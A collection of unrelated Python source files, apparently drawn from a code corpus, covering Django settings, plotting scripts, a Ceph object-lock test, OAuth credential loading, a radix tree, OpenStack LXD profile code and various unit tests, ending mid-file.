'default': { 'ENGINE': 'django.db.backends.postgresql_psycopg2', 'NAME': 'postgres', 'USER': 'postgres', 'PASSWORD': '', 'HOST': 'db', 'PORT': 5432 } } else: DATABASES = { 'default': { 'ENGINE': 'django.db.backends.postgresql_psycopg2', 'NAME': os.getenv('DB_NAME'), 'USER': os.getenv('DB_USER'), 'PASSWORD': os.getenv('DB_PASS'), 'HOST': os.getenv('DB_HOST'), 'PORT': 5432 } } # Internationalization # https://docs.djangoproject.com/en/1.8/topics/i18n/ LANGUAGE_CODE = 'en-us' TIME_ZONE = 'UTC' USE_I18N = True USE_L10N = True USE_TZ = True # Static files (CSS, JavaScript, Images) # https://docs.djangoproject.com/en/1.8/howto/static-files/ STATIC_URL = '/static/' # STATICFILES_DIRS = ( # os.path.join(BASE_DIR, 'static'), # ) # print(STATICFILES_DIRS) STATIC_ROOT = os.path.join(BASE_DIR, 'static') LOGGING = { 'version': 1, 'formatters': { 'verbose': { 'format': '%(levelname)s %(asctime)s %(module)s %(process)d %(thread)d %(message)s' }, 'simple': { 'format': '%(levelname)s %(message)s' }, }, 'handlers': { 'file': { 'class': 'logging.FileHandler', 'filename': '/var/log/django.log', 'formatter': 'verbose', }, }, 'loggers': { 'django.request': { 'handlers': ['file'], 'level': 'INFO', 'propagate': False, } }, }dblakely/FastSK import os import os.path as osp import pandas as pd import matplotlib.pyplot as plt import matplotlib.style as style style.use('ggplot') plt.rcParams['axes.facecolor']='w' plt.rcParams['axes.edgecolor']='black' plt.rcParams['grid.color']='#abbbc6' from matplotlib.ticker import MultipleLocator, FormatStrFormatter, AutoMinorLocator import matplotlib.ticker as mticker import seaborn as sns import numpy as np import string from scipy import special import argparse # replace '../../fastsk.xlsx' with filepath all_data = pd.read_excel (r'fastsk.xlsx', sheet_name = 'FigureAll') count = 0 # A new large figures with 5 per row data = all_data df = pd.DataFrame(data, columns= ['Fraction', 'FastSK', 'CharCNN']) i = 0 titles, x, y1, y2 = [], [], [], [] while not df[i*5:i*5+5].empty: a = [] subset = df[i*5:i*5+5] titles.append(subset['Fraction'].values.tolist()[0]) x.append(subset['Fraction'].values.tolist()[2:]) y1.append(subset['FastSK'].values.tolist()[2:]) y2.append(subset['CharCNN'].values.tolist()[2:]) i += 1 fig, axes = plt.subplots(i//5+min(1,i%5),5, figsize=(12, 10)) plt.setp(axes, xticks=np.arange(0,1.25,.25)) for n in range(i): axes[n//5,n%5].plot(x[n],y1[n],'bo-', label = 'FastSK') axes[n//5,n%5].plot(x[n],y2[n],'ro--', label = 'charCNN') axes[n//5,n%5].set_title(titles[n]) #axes[n//5,n%5].set_yticks(np.arange(0.4,1.0,.2)) handles, labels = axes[n//5,n%5].get_legend_handles_labels() legend = fig.legend(handles, labels, prop={'size': 15}, edgecolor='black', fontsize='x-large', loc='best', bbox_to_anchor=(0.92,0.12)) fig.delaxes(axes[5,4]) fig.delaxes(axes[5,3]) # add figure axes labels fig.text(0.5, 0.00, 'Traning Size Ratio', ha='center', fontsize=15) fig.text(0.00, 0.5, 'Area Under the ROC Curve', va='center', rotation='vertical', fontsize=16) fig.tight_layout() outfile = "FigureAllFastSKvsCNNVaryTr.pdf" print("Saving to {}".format(outfile)) plt.savefig(outfile) plt.show() from contextlib import suppress from .adaptive import Adaptive from .cluster import Cluster from .local import LocalCluster from .spec import ProcessInterface, SpecCluster from .ssh import SSHCluster with suppress(ImportError): from .ssh import SSHCluster from .key import Key from .right import Right from .sma import WebConnect from ..qt.QtWebKit import QWebView, QWebSettings from qt_ace_editor import QtAceEditor class QtAceEditorView(QWebView): def __init__(self, parent=None): """ Initialize the editor window """ super(QtAceEditorView, self).__init__(parent) self.ace_editor = QtAceEditor() # XXX this is used for debugging, it should be taken out eventually self.settings().setAttribute(QWebSettings.DeveloperExtrasEnabled, True) self.main_frame = self.page().mainFrame() self.main_frame.addToJavaScriptWindowObject('py_ace_editor', self.ace_editor) self.ace_editor.generate_ace_event('set_text_from_js', 'getSession()', 'editor.getSession().getDocument().getValue()', 'change') self.ace_editor.generate_binding('theme_changed', 'editor', 'setTheme') self.ace_editor.generate_binding('mode_changed', 'editor.getSession()', 'setMode') self.ace_editor.generate_binding('text_changed', 'editor.getSession().doc', 'setValue') self.ace_editor.generate_binding('auto_pair_changed', 'editor', 'setBehavioursEnabled') self.ace_editor.generate_binding('font_size_changed', 'editor', 'setFontSize') self.ace_editor.generate_binding('margin_line_changed', 'editor', 'setShowPrintMargin') self.ace_editor.generate_binding('margin_line_column_changed', 'editor', 'setPrintMarginColumn') html = self.ace_editor.generate_html() self.setHtml(html) def editor(self): """ Return the ace editor """ return self.ace_editor l = [1,2,3,4,5] print(l) def mul_by2(num): return num*2 for result in map(mul_by2,l): print(result) rgw/v2/tests/s3_swift/test_object_lock.py """ test_object_lock.py - Test object lock configuration for bucket Usage: test_object_lock.py -c test_object_lock.yaml Operation: Create bucket with bucket lock enabled Enable object lock configuration Upload object to the bucket Upload another object in same bucket Verify new version is created for object Verify deletion of object versions are disabled """ import os import sys sys.path.append(os.path.abspath(os.path.join(__file__, "../../../.."))) import argparse import hashlib import logging import traceback import botocore.exceptions as boto3exception import v2.lib.resource_op as s3lib import v2.utils.utils as utils from v2.lib.exceptions import ( AccessDeniedObjectDeleted, ObjectVersionCountMismatch, RGWBaseException, TestExecError, ) from v2.lib.manage_data import io_generator from v2.lib.resource_op import Config from v2.lib.rgw_config_opts import CephConfOp from v2.lib.s3.auth import Auth from v2.lib.s3.write_io_info import BasicIOInfoStructure, IOInfoInitialize from v2.tests.s3_swift import reusable from v2.tests.s3cmd.reusable import get_rgw_ip_and_port from v2.utils.log import configure_logging from v2.utils.test_desc import AddTestInfo from v2.utils.utils import RGWService log = logging.getLogger() TEST_DATA_PATH = None password = "".encode("") encryption_key = hashlib.md5(password).hexdigest() def test_exec(config): io_info_initialize = IOInfoInitialize() basic_io_structure = BasicIOInfoStructure() io_info_initialize.initialize(basic_io_structure.initial()) ceph_conf = CephConfOp() rgw_service = RGWService() # create user all_users_info = s3lib.create_users(config.user_count) for each_user in all_users_info: # authentication auth = Auth(each_user, ssl=config.ssl) s3_conn_client = auth.do_auth_using_client() # create buckets with object lock configuration if config.test_ops["create_bucket"] is True: log.info(f"no of buckets to create: {config.bucket_count}") for bc in range(config.bucket_count): bucket_name_to_create = utils.gen_bucket_name_from_userid( each_user["user_id"], rand_no=bc ) log.info(f"creating bucket with name: {bucket_name_to_create}") rgw_ip_and_port = get_rgw_ip_and_port() s3_conn_client.create_bucket( Bucket=bucket_name_to_create, ObjectLockEnabledForBucket=True ) # put object lock configuration for bucket s3_conn_client.put_object_lock_configuration( Bucket=bucket_name_to_create, ObjectLockConfiguration={ "ObjectLockEnabled": "Enabled", "Rule": {"DefaultRetention": {"Mode": "COMPLIANCE", "Days": 1}}, }, ) if config.test_ops["create_object"] is True: # uploading data log.info(f"s3 objects to create: {config.objects_count}") for oc, size in list(config.mapped_sizes.items()): s3_object_name = utils.gen_s3_object_name( bucket_name_to_create, 0 ) log.info(f"s3 object name: {s3_object_name}") s3_object_path = os.path.join(TEST_DATA_PATH, s3_object_name) log.info(f"s3 object path: {s3_object_path}") log.info("upload type: normal") io_generator(TEST_DATA_PATH + "/" + s3_object_name, size) s3_conn_client.put_object( Body=TEST_DATA_PATH + "/" + s3_object_name, Bucket=bucket_name_to_create, Key=s3_object_name, ) log.info("Verify version count") # Verify version count versions = s3_conn_client.list_object_versions( Bucket=bucket_name_to_create ) versions_count = len(versions["Versions"]) error_message = ( f"Expected: {config.objects_count}, Actual: {versions_count}" ) if versions_count == config.objects_count: log.info("Expected and actual version count is same") else: raise ObjectVersionCountMismatch(error_message) # Verify delete disabled for object log.info("Verify delete disabled for object") for version_dict in versions["Versions"]: try: s3_conn_client.delete_object( Bucket=bucket_name_to_create, Key=s3_object_name, VersionId=version_dict["VersionId"], ) raise AccessDeniedObjectDeleted( "Access denied object deleted" ) except boto3exception.ClientError as e: expected_code = "AccessDenied" actual_code = e.response["Error"]["Code"] assert ( actual_code == expected_code ), "Expected: {expected_code}, Actual: {actual_code}" # check for any crashes during the execution crash_info = reusable.check_for_crash() if crash_info: raise TestExecError("ceph daemon crash found!") if __name__ == "__main__": test_info = AddTestInfo("create m buckets with n objects") test_info.started_info() try: project_dir = os.path.abspath(os.path.join(__file__, "../../..")) test_data_dir = "test_data" ceph_conf = CephConfOp() rgw_service = RGWService() TEST_DATA_PATH = os.path.join(project_dir, test_data_dir) log.info("TEST_DATA_PATH: {TEST_DATA_PATH}") if not os.path.exists(TEST_DATA_PATH): log.info("test data dir not exists, creating.. ") os.makedirs(TEST_DATA_PATH) usage = """ Usage: python3 test_object_lock.py -c test_object_lock.yaml """ parser = argparse.ArgumentParser(description=usage) parser.add_argument("-c", dest="config", help=usage) parser.add_argument( "-log_level", dest="log_level", help="Set Log Level [DEBUG, INFO, WARNING, ERROR, CRITICAL]", default="info", ) # ch.setLevel(logging.getLevelName(console_log_level.upper())) args = parser.parse_args() yaml_file = args.config log_f_name = os.path.basename(os.path.splitext(yaml_file)[0]) configure_logging(f_name=log_f_name, set_level=args.log_level.upper()) config = Config(yaml_file) config.read() if config.mapped_sizes is None: config.mapped_sizes = utils.make_mapped_sizes(config) test_exec(config) test_info.success_status("test passed") sys.exit(0) except (RGWBaseException, Exception) as e: log.info(e) log.info(traceback.format_exc()) test_info.failed_status("test failed") sys.exit(1) MichaelGuldborg/Web-scraping import os.path import pickle from google.auth.transport.requests import Request from google_auth_oauthlib.flow import InstalledAppFlow # If modifying these scopes, delete the file token.pickle. SCOPES = ['https://www.googleapis.com/auth/calendar.readonly'] def fetch_credentials(): creds = None # The file token.pickle stores the user's access and refresh tokens, and is # created automatically when the authorization flow completes for the first # time. if os.path.exists('token.pickle'): with open('token.pickle', 'rb') as token: creds = pickle.load(token) # If there are no (valid) credentials available, let the user log in. if not creds or not creds.valid: if creds and creds.expired and creds.refresh_token: creds.refresh(Request()) else: flow = InstalledAppFlow.from_client_secrets_file( 'credentials.json', SCOPES) creds = flow.run_local_server() # Save the credentials for the next run with open('token.pickle', 'wb') as token: pickle.dump(creds, token) return creds DeanCivlin/AcadeMe1-10 from django.apps import AppConfig class AcademedataConfig(AppConfig): name = 'AcadeMeData' import logging import os from pathlib import Path from unittest import mock from unittest import TestCase from click.testing import CliRunner from xsdata import cli from xsdata.logger import logger from xsdata.transformer import SchemaTransformer root = Path(__file__).parent.parent fixtures = root.joinpath("tests/fixtures/defxmlschema") os.chdir(root) class CliTests(TestCase): def setUp(self): self.runner = CliRunner() super(CliTests, self).setUp() @mock.patch.object(SchemaTransformer, "process") @mock.patch.object(SchemaTransformer, "__init__", return_value=None) def test_default_output(self, mock_transformer_init, *args): source = fixtures.joinpath("chapter02/example0202.xsd") result = self.runner.invoke(cli, [str(source), "--package", "foo"]) self.assertIsNone(result.exception) mock_transformer_init.assert_called_once_with(output="pydata", print=False) @mock.patch.object(SchemaTransformer, "process") @mock.patch.object(SchemaTransformer, "__init__", return_value=None) def test_custom_output(self, mock_transformer_init, *args): source = fixtures.joinpath("chapter02/example0202.xsd") result = self.runner.invoke( cli, [str(source), "--package", "foo", "--output", "plantuml"] ) self.assertIsNone(result.exception) mock_transformer_init.assert_called_once_with(output="plantuml", print=False) @mock.patch.object(SchemaTransformer, "process") @mock.patch.object(SchemaTransformer, "__init__", return_value=None) def test_print_mode(self, mock_transformer_init, *args): source = fixtures.joinpath("chapter02/example0202.xsd") result = self.runner.invoke(cli, [str(source), "--package", "foo", "--print"]) self.assertIsNone(result.exception) mock_transformer_init.assert_called_once_with(output="pydata", print=True) self.assertEqual(logging.ERROR, logger.getEffectiveLevel()) @mock.patch.object(SchemaTransformer, "process") def test_with_single_definition(self, mock_transformer_process): source = fixtures.joinpath("chapter02/example0202.xsd") result = self.runner.invoke( cli, [str(source.relative_to(root)), "--package", "foo"] ) self.assertIsNone(result.exception) mock_transformer_process.assert_called_once_with([source], "foo") @mock.patch.object(SchemaTransformer, "process") def test_with_multiple_definitions(self, mock_transformer_process): first_source = fixtures.joinpath("chapter02/example0202.xsd") second_source = fixtures.joinpath("chapter02/example0206.xsd") result = self.runner.invoke( cli, [ str(first_source.relative_to(root)), str(second_source.relative_to(root)), "--package", "foo", ], ) self.assertIsNone(result.exception) mock_transformer_process.assert_called_once_with( [first_source, second_source], "foo" ) @mock.patch.object(SchemaTransformer, "process") def test_with_directory(self, mock_transformer_process): first_source = fixtures.joinpath("chapter01") second_source = fixtures.joinpath("chapter02/example0206.xsd") result = self.runner.invoke( cli, [str(first_source), str(second_source), "--package", "foo"] ) self.assertIsNone(result.exception) schemas = list(first_source.glob("*.xsd")) schemas.append(second_source) mock_transformer_process.assert_called_once_with(schemas, "foo") # -*- coding: utf-8 -*- # Generated by Django 1.10.8 on 2017-10-10 13:54 from __future__ import unicode_literals from django.db import migrations, models def migrate_projects(apps, schema_editor): ProjectsContent = apps.get_model('cms', 'ProjectsContent') for project_block in ProjectsContent.objects.all(): project_block.new_projects = project_block.projects.projects.all() project_block.save() class Migration(migrations.Migration): dependencies = [ ('cms', '0030_migrate_projects_1'), ] operations = [ migrations.AlterModelManagers( name='ProjectsContent', managers=[ ('objects', models.manager.Manager()), ], ), migrations.RunPython(migrate_projects), ] # -*- coding: utf-8 -*- """ Radix Tree in Python """ class RadixTreeNode(object): def __init__(self, path=None, handler=None, methods=None): self.path = path self.methods = {} self.children = [] self.indices = str() self.size = 0 self.addMethods(methods, handler) def __repr__(self): return (''.format(self.path, self.methods, self.indices, self.children)) def addMethods(self, methods, handler): if not methods: return if not isinstance(methods, (list, tuple, set)): methods = [methods] for method in methods: if method in self.methods and self.methods[method] != handler: raise KeyError( '{} conflicts with existed handler ' '{}'.format(handler, self.methods[method])) self.methods[method] = handler def bisect(self, target): low, high = 0, self.size while low < high: mid = low + high >> 1 if self.indices[mid] < target: low = mid + 1 else: high = mid return low def insertChild(self, index, child): pos = self.bisect(index) self.indices = self.indices[:pos] + index + self.indices[pos:] self.children.insert(pos, child) self.size += 1 return child def getChild(self, index): for i, char in enumerate(self.indices): if char == index: return self.children[i] class RadixTree(object): def __init__(self): self.root = RadixTreeNode() def __repr__(self): return repr(self.root) def insert(self, key, handler, methods): i, n, root = 0, len(key), self.root getPosition = lambda i: n if i == -1 else i while i < n: conflict, num = [], (key[i] == ':') + (root.indices == ':') if (root.indices == '*' or key[i] == '*' and root.indices or num == 1 or num == 2 and key[i + 1:getPosition( key.find('/', i))] != root.getChild(':').path): conflict = [key[:i] + p for p in self.traverse(root)] if conflict: raise Exception('"{}" conflicts with {}'.format(key, conflict)) child = root.getChild(key[i]) if child is None: pos = getPosition(key.find(':', i)) if pos == n: pos = getPosition(key.find('*', i)) if pos == n: root.insertChild( key[i], RadixTreeNode(key[i:], handler, methods)) return root = root.insertChild(key[i], RadixTreeNode(key[i:pos])) root.insertChild( '*', RadixTreeNode(key[pos + 1:], handler, methods)) return root = root.insertChild(key[i], RadixTreeNode(key[i:pos])) i = getPosition(key.find('/', pos)) root = root.insertChild(':', RadixTreeNode(key[pos + 1:i])) if i == n: root.addMethods(methods, handler) else: root = child if key[i] == ':': i += len(root.path) + 1 if i == n: root.addMethods(methods, handler) else: j, m = 0, len(root.path) while i < n and j < m and key[i] == root.path[j]: i += 1 j += 1 if j < m: child = RadixTreeNode(root.path[j:]) child.methods = root.methods child.children = root.children child.indices = root.indices child.size = root.size root.path = root.path[:j] root.methods = {} root.children = [child] root.indices = child.path[0] root.size = 1 if i == n: root.addMethods(methods, handler) def get(self, key, method): i, n, root, params = 0, len(key), self.root, {} while i < n: if root.indices == ':': root, pos = root.children[0], key.find('/', i) if pos == -1: pos = n params[root.path], i = key[i:pos], pos elif root.indices == '*': root = root.children[0] params[root.path] = key[i:] break else: root = root.getChild(key[i]) if root is None: return False, None, {} pos = i + len(root.path) if key[i:pos] != root.path: return False, None, {} i = pos return True, root.methods.get(method, None), params def traverse(self, root): r = [] for i, char in enumerate(root.indices): child = root.children[i] path = '{}{}'.format( char if char in [':', '*'] else '', child.path) if child.methods and child.indices: r.append([path]) r.append([path + p for p in self.traverse(child) or ['']]) return sum(r, []) #!/usr/bin/env python3.7 """ Mastering Object-Oriented Python 2e Code Examples for Mastering Object-Oriented Python 2nd Edition Chapter 15. Example 2. """ from typing import ( NamedTuple, List, Type, Optional, Iterator, Tuple, DefaultDict, Union, cast, Any, ) import random from collections import defaultdict # Duck Typing from typing import NamedTuple class Domino_1(NamedTuple): v1: int v2: int @property def double(self) -> bool: return self.v1 == self.v2 @property def score(self) -> int: return self.v1 + self.v2 from dataclasses import dataclass @dataclass(frozen=True, eq=True, order=True) class Domino_2: v1: int v2: int @property def double(self) -> bool: return self.v1 == self.v2 @property def score(self) -> int: return self.v1 + self.v2 Domino = Union[Domino_1, Domino_2] def builder(v1: int, v2: int) -> Domino: return Domino_2(v1, v2) test_dominoe_classes = """ >>> d_1a = Domino_1(6, 5) >>> d_1b = Domino_1(6, 5) >>> d_1a == d_1b True >>> d_1a.double False >>> d_1a.score 11 >>> d_2a = Domino_2(5, 3) >>> d_2b = Domino_2(5, 3) >>> d_2a == d_2b True >>> d_2a.double False >>> d_2a.score 8 """ # More Complex Example class Hand(list): def __init__(self, *args: Domino) -> None: super().__init__(cast(Tuple[Any], args)) def score(self) -> int: return sum(d.score for d in self) def rank(self) -> None: self.sort(key=lambda d: d.score, reverse=True) def doubles(self) -> List[Domino_1]: return [d for d in self if d.double] def highest_double(self) -> Optional[Domino_1]: descending = sorted(self.doubles(), key=lambda d: d.v1, reverse=True) if descending: return descending[0] return None class DominoBoneYard: domino_class: Type[Domino] = Domino_1 hand_class: Type[Hand] = Hand hand_size: int = 7 def __init__(self, limit: int = 6) -> None: self._dominoes: List[Domino] = [ self.domino_class(x, y) for x in range(limit + 1) for y in range(x + 1) ] random.shuffle(self._dominoes) def draw(self, n: int = 1) -> Optional[List[Domino]]: deal, remainder = self._dominoes[:n], self._dominoes[n:] if len(deal) != n: return None self._dominoes = remainder return deal def hand_iter(self, players: int = 4) -> Iterator[Hand]: hands: List[Optional[List[Domino]]] = [ self.draw(self.hand_size) for _ in range(players) ] if not all(hands): raise ValueError(f"Can't deal {self.hand_size} tiles to {players} players") yield from (self.hand_class(*h) for h in hands if h is not None) test_dby = """ >>> random.seed(42) >>> DominoBoneYard.hand_class = Hand >>> dby = DominoBoneYard() >>> len(dby._dominoes) 28 >>> hands = list(dby.hand_iter(4)) >>> hands[0] [Domino_1(v1=5, v2=3), Domino_1(v1=5, v2=1), Domino_1(v1=4, v2=0), Domino_1(v1=6, v2=0), Domino_1(v1=6, v2=6), Domino_1(v1=3, v2=0), Domino_1(v1=2, v2=2)] >>> hands[0].score() 43 >>> hd = hands[0].highest_double() >>> hd Domino_1(v1=6, v2=6) >>> hands[1] [Domino_1(v1=4, v2=1), Domino_1(v1=4, v2=4), Domino_1(v1=3, v2=3), Domino_1(v1=6, v2=3), Domino_1(v1=4, v2=2), Domino_1(v1=5, v2=4), Domino_1(v1=5, v2=0)] """ test_dby_exception = """ >>> random.seed(42) >>> DominoBoneYard.hand_class = Hand >>> dby = DominoBoneYard() >>> hands = list(dby.hand_iter(5)) # doctest: +IGNORE_EXCEPTION_DETAIL Traceback (most recent call last): File "/Users/slott/miniconda3/envs/mastering/lib/python3.7/doctest.py", line 1329, in __run compileflags, 1), test.globs) File "", line 1, in hands = list(dby.hand_iter(5)) File "/Users/slott/Documents/.../mastering-oo-python-2e/Chapter_15/ch15_ex2.py", line 119, in hand_iter raise ValueError(f"Can't deal {self.hand_size} tiles to {players} players") ValueError: Can't deal 7 tiles to 5 players """ class Hand_X1(Hand): def __init__(self, *args) -> None: super().__init__(*args) self.end: DefaultDict[int, List[Domino_1]] = defaultdict(list) for d in self: self.end[d.v1].append(d) self.end[d.v2].append(d) def matches(self, spots: int) -> List[Domino_1]: return self.end.get(spots, []) test_dby_3 = """ >>> random.seed(42) >>> DominoBoneYard.hand_class = Hand_X1 >>> DominoBoneYard.domino_class = Domino_2 >>> dby = DominoBoneYard() >>> len(dby._dominoes) 28 >>> hands = list(dby.hand_iter(4)) >>> h_0 = hands[0] >>> h_0 [Domino_2(v1=5, v2=3), Domino_2(v1=5, v2=1), Domino_2(v1=4, v2=0), Domino_2(v1=6, v2=0), Domino_2(v1=6, v2=6), Domino_2(v1=3, v2=0), Domino_2(v1=2, v2=2)] >>> h_0.score() 43 >>> h_0.matches(3) [Domino_2(v1=5, v2=3), Domino_2(v1=3, v2=0)] """ __test__ = {name: value for name, value in locals().items() if name.startswith("test_")} if __name__ == "__main__": import doctest doctest.testmod(verbose=False) # Copyright 2016 Canonical Ltd # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import os from nova import exception from nova import i18n from nova.virt import driver from oslo_config import cfg from oslo_utils import units from nova.virt.lxd import common from nova.virt.lxd import vif _ = i18n._ CONF = cfg.CONF def _base_config(instance, _): instance_attributes = common.InstanceAttributes(instance) return { 'environment.product_name': 'OpenStack Nova', 'raw.lxc': 'lxc.console.logfile={}\n'.format( instance_attributes.console_path), } def _nesting(instance, _): if instance.flavor.extra_specs.get('lxd:nested_allowed'): return {'security.nesting': 'True'} def _security(instance, _): if instance.flavor.extra_specs.get('lxd:privileged_allowed'): return {'security.privileged': 'True'} def _memory(instance, _): mem = instance.memory_mb if mem >= 0: return {'limits.memory': '{}MB'.format(mem)} def _cpu(instance, _): vcpus = instance.flavor.vcpus if vcpus >= 0: return {'limits.cpu': str(vcpus)} def _isolated(instance, client): lxd_isolated = instance.flavor.extra_specs.get('lxd:isolated') if lxd_isolated: extensions = client.host_info.get('api_extensions', []) if 'id_map' in extensions: return {'security.idmap.isolated': 'True'} else: msg = _("Host does not support isolated instances") raise exception.NovaException(msg) _CONFIG_FILTER_MAP = [ _base_config, _nesting, _security, _memory, _cpu, _isolated, ] def _root(instance, client, *_): """Configure the root disk.""" device = {'type': 'disk', 'path': '/'} # we don't do quotas if the CONF.lxd.pool is set and is dir or lvm, or if # the environment['storage'] is dir or lvm. if CONF.lxd.pool: extensions = client.host_info.get('api_extensions', []) if 'storage' in extensions: device['pool'] = CONF.lxd.pool storage_type = client.storage_pools.get(CONF.lxd.pool).driver else: msg = _("Host does not have storage pool support") raise exception.NovaException(msg) else: storage_type = client.host_info['environment']['storage'] if storage_type in ['btrfs', 'zfs']: device['size'] = '{}GB'.format(instance.root_gb) specs = instance.flavor.extra_specs # Bytes and iops are not separate config options in a container # profile - we let Bytes take priority over iops if both are set. # Align all limits to MiB/s, which should be a sensible middle road. if specs.get('quota:disk_read_iops_sec'): device['limits.read'] = '{}iops'.format( specs['quota:disk_read_iops_sec']) if specs.get('quota:disk_write_iops_sec'): device['limits.write'] = '{}iops'.format( specs['quota:disk_write_iops_sec']) if specs.get('quota:disk_read_bytes_sec'): device['limits.read'] = '{}MB'.format( int(specs['quota:disk_read_bytes_sec']) // units.Mi) if specs.get('quota:disk_write_bytes_sec'): device['limits.write'] = '{}MB'.format( int(specs['quota:disk_write_bytes_sec']) // units.Mi) minor_quota_defined = ('limits.write' in device or 'limits.read' in device) if specs.get('quota:disk_total_iops_sec') and not minor_quota_defined: device['limits.max'] = '{}iops'.format( specs['quota:disk_total_iops_sec']) if specs.get('quota:disk_total_bytes_sec') and not minor_quota_defined: device['limits.max'] = '{}MB'.format( int(specs['quota:disk_total_bytes_sec']) // units.Mi) return {'root': device} def _ephemeral_storage(instance, client, __, block_info): instance_attributes = common.InstanceAttributes(instance) ephemeral_storage = driver.block_device_info_get_ephemerals(block_info) if ephemeral_storage: devices = {} for ephemeral in ephemeral_storage: ephemeral_src = os.path.join( instance_attributes.storage_path, ephemeral['virtual_name']) device = { 'path': '/mnt', 'source': ephemeral_src, 'type': 'disk', } if CONF.lxd.pool: extensions = client.host_info.get('api_extensions', []) if 'storage' in extensions: device['pool'] = CONF.lxd.pool else: msg = _("Host does not have storage pool support") raise exception.NovaException(msg) devices[ephemeral['virtual_name']] = device return devices def _network(instance, _, network_info, __): if not network_info: return devices = {} for vifaddr in network_info: cfg = vif.get_config(vifaddr) devname = vif.get_vif_devname(vifaddr) key = devname devices[key] = { 'nictype': 'physical', 'hwaddr': str(cfg['mac_address']), 'parent': vif.get_vif_internal_devname(vifaddr), 'type': 'nic' } specs = instance.flavor.extra_specs # Since LXD does not implement average NIC IO and number of burst # bytes, we take the max(vif_*_average, vif_*_peak) to set the peak # network IO and simply ignore the burst bytes. # Align values to MBit/s (8 * powers of 1000 in this case), having # in mind that the values are recieved in Kilobytes/s. vif_inbound_limit = max( int(specs.get('quota:vif_inbound_average', 0)), int(specs.get('quota:vif_inbound_peak', 0)), ) if vif_inbound_limit: devices[key]['limits.ingress'] = '{}Mbit'.format( vif_inbound_limit * units.k * 8 // units.M) vif_outbound_limit = max( int(specs.get('quota:vif_outbound_average', 0)), int(specs.get('quota:vif_outbound_peak', 0)), ) if vif_outbound_limit: devices[key]['limits.egress'] = '{}Mbit'.format( vif_outbound_limit * units.k * 8 // units.M) return devices _DEVICE_FILTER_MAP = [ _root, _ephemeral_storage, _network, ] def to_profile(client, instance, network_info, block_info, update=False): """Convert a nova flavor to a lxd profile. Every instance container created via nova-lxd has a profile by the same name. The profile is sync'd with the configuration of the container. When the instance container is deleted, so is the profile. """ name = instance.name config = {} for f in _CONFIG_FILTER_MAP: new = f(instance, client) if new: config.update(new) devices = {} for f in _DEVICE_FILTER_MAP: new = f(instance, client, network_info, block_info) if new: devices.update(new) if update is True: profile = client.profiles.get(name) profile.devices = devices profile.config = config profile.save() return profile else: return client.profiles.create(name, config, devices) PipeGen/pipeline-generator import pandas as pd import pickle import json import os # from .var_dict import VarDict def find_in_vardict(vardict, name): for x in vardict.var_dict: if x["variable_name"] == name: return x def check_for_df(vardict, var_name): flag = 0 for x in vardict.var_dict: if ((x["variable_name"] == var_name) and (x["type"]==pd.DataFrame)): flag = 1 if flag==0: return False return True def save_file(f): with open('./media/' + f.name, 'wb+') as destination: for chunk in f.chunks(): destination.write(chunk) def dump_to_pkl(obj, filename): out_file = open('./calc/json_dumps/'+filename, 'wb') pickle.dump(obj, out_file) out_file.close() def load_pkl(filename): try: with open('./calc/json_dumps/' + filename, 'rb') as infile: obj = pickle.load(infile, encoding = 'bytes') except EOFError as e: obj = None return obj def dump_to_json(obj, filename): with open('./calc/json_dumps/'+ filename + '.json','w') as json_file: json.dump(obj, json_file) def load_json(filename): try: with open('./calc/json_dumps/' + filename +'.json') as json_file: data = json.load(json_file) except EOFError as e: data = None return data def addCell(cellName): opData = [] with open('./calc/json_dumps/opdata.json', 'r') as json_file: opData = json.load(json_file) add_cell_data(opData, cellName) with open('./calc/json_dumps/opdata.json','w') as json_file: json.dump(opData, json_file) def getMediaFiles(): path = "./media/" lst = os.listdir(path) lst.remove('downloads') return lst def getContext(): context = load_pkl('context') media_files = getMediaFiles() # for list of operations opdata = load_json('opdata') # for getting variable names vardict = load_pkl('vardict') if vardict != None: varList = vardict.get_var_list() else: varList = [] context['files'] = media_files context['opdata'] = opdata context['varlist'] = varList return context def setContext(key, value): context = load_pkl('context') context[key] = value dump_to_pkl(context, 'context') return context # Function not used outside util def add_cell_data(opData, cellName): def splitName(cellData): cellType = cellData['name'].split('-')[0] if cellType == cellName: return True else: return False cells = list(filter(splitName, opData)) new_cell_idx = str(len(cells)) setContext('currentCell', cellName + "-" + new_cell_idx) opData.append({ "type" : cellName+'.html', "name" : cellName + "-" + new_cell_idx, "data" : {} }) def set_cell_data(opData, cellName, key, value): for cell in opData: if cell['name'] == cellName: cell['data'][key] = value 1-10 from pytest import raises from binpickle.format import * def test_format_sizes(): assert HEADER_FORMAT.size == 16 assert TRAILER_FORMAT.size == 16 def test_pack_default_header(): h = FileHeader() bs = h.encode() assert len(bs) == 16 def test_default_header_round_trip(): h = FileHeader() bs = h.encode() assert len(bs) == 16 h2 = FileHeader.decode(bs) assert h2 is not h assert h2 == h def test_size_round_trip(): h = FileHeader(length=57) bs = h.encode() assert len(bs) == 16 h2 = FileHeader.decode(bs) assert h2.length == 57 assert h2 == h def test_catch_bad_magic(): with raises(ValueError) as exc: FileHeader.decode(b'BNPQ\x00\x00\x00\x00' + (b'\x00' * 8)) assert 'magic' in str(exc.value) def test_catch_bad_version(): with raises(ValueError) as exc: FileHeader.decode(b'BPCK\x00\x02\x00\x00' + (b'\x00' * 8)) assert 'version' in str(exc.value) def test_catch_bad_padding(): with raises(ValueError) as exc: FileHeader.decode(b'BPCK\x00\x01\x00\xff' + (b'\x00' * 8)) assert 'padding' in str(exc.value) dolboBobo/python3_ios """ =========== Marker Path =========== Using a `~.path.Path` as marker for a `~.axes.Axes.plot`. """ import matplotlib.pyplot as plt import matplotlib.path as mpath import numpy as np star = mpath.Path.unit_regular_star(6) circle = mpath.Path.unit_circle() # concatenate the circle with an internal cutout of the star verts = np.concatenate([circle.vertices, star.vertices[::-1, ...]]) codes = np.concatenate([circle.codes, star.codes]) cut_star = mpath.Path(verts, codes) plt.plot(np.arange(10)**2, '--r', marker=cut_star, markersize=15) plt.show() ############################################################################# # # ------------ # # References # """""""""" # # The use of the following functions, methods, classes and modules is shown # in this example: import matplotlib matplotlib.path matplotlib.path.Path matplotlib.path.Path.unit_regular_star matplotlib.path.Path.unit_circle matplotlib.axes.Axes.plot matplotlib.pyplot.plot # app/mod_user/forms.py from flask_wtf import FlaskForm from wtforms 